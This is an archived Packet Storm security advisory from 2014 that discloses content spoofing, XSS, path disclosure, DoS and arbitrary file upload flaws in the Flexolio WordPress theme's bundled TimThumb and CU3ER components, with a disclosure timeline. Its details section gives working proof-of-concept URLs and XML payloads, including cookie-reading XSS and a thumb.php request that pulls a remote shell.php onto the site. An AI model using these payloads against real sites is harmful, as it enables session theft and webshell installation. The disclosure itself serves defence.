exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Flexolio XSS / Disclosure / File Upload

WordPress Flexolio XSS / Disclosure / File Upload
Posted May 5, 2014
Authored by MustLive

WordPress Flexolio plugin suffers from cross site scripting, denial of service, path disclosure, abuse of functionality, and arbitrary file upload vulnerabilities.

tags | exploit, denial of service, arbitrary, vulnerability, xss, info disclosure, file upload
SHA-256 | 1c71e41e685661e1a0998430a82bd15735d3cdf70cf628becdd315daeb2ccd40
Download | Favorite | View

WordPress Flexolio XSS / Disclosure / File Upload

Change Mirror Download
Hello list!

There are Content Spoofing, Cross-Site Scripting, Full path disclosure, 
Abuse of Functionality, Denial of Service and Arbitrary File Upload 
vulnerabilities in Flexolio for WordPress. Which contains TimThumb and 
CU3ER.

In April 2011 I wrote about vulnerabilities in TimThumb 
(http://seclists.org/fulldisclosure/2011/Apr/227) and in April 2014 I wrote 
about vulnerabilities in CU3ER 
(http://seclists.org/fulldisclosure/2014/Apr/244).

-------------------------
Affected products:
-------------------------

Vulnerable are all versions of Flexolio.

-------------------------
Affected vendors:
-------------------------

Quarterpixel
http://quarterpixel.de

----------
Details:
----------

Content Spoofing (Content Injection) (WASC-12):

http://site/wp-content/themes/flexolio/inc/cu3er/cu3er.swf?xml=http://site2/1.xml

File 1.xml:

<?xml version="1.0" encoding="UTF-8"?>
<cu3er>
<slides>
<slide>
<url>1.jpg</url>
<link>http://websecurity.com.ua</link>
</slide>
</slides>
</cu3er>

Cross-Site Scripting (WASC-08):

http://site/wp-content/themes/flexolio/inc/cu3er/cu3er.swf?xml=http://site2

File xss.xml:

<?xml version="1.0" encoding="UTF-8"?>
<cu3er>
<slides>
<slide>
<url>1.jpg</url>
<link>javascript:alert(document.cookie)</link>
</slide>
</slides>
</cu3er>

For cross-domain attacks it's needed to have crossdomain.xml at web site 
with xml-files.

Cross-Site Scripting (WASC-08):

http://site/wp-content/themes/flexolio/inc/thumb.php?src=1%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):

http://site/wp-content/themes/flexolio/inc/thumb.php?src=http://

And also Abuse of Functionality and DoS in vulnerabilities in TimThumb 
(http://seclists.org/fulldisclosure/2011/Apr/227) and Arbitrary File Upload 
vulnerability, which was disclosed after 3,5 months after my disclosure of 
previous holes. They are possible in old versions of the theme, because in 
the last versions of the theme in TimThumb the access to remote sites is 
forbidden.

Arbitrary File Upload (WASC-31):

http://site/wp-content/themes/flexolio/inc/thumb.php?src=http://site.com/shell.php

Full path disclosure (WASC-13):

FPD in php-files of the theme (by default) or in error_log. In index.php and 
other php-files.

http://site/wp-content/themes/webfolio/

------------
Timeline:
------------ 

2013.11.22 - announced at my site about CU3ER.
2013.11.26 - informed developer.
2013.11.26 - announced at my site about plugins and later about themes. 
Later informed developers of the plugins and themes.
2014.04.26 - disclosed at my site about Flexolio for WordPress 
(http://websecurity.com.ua/7141/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close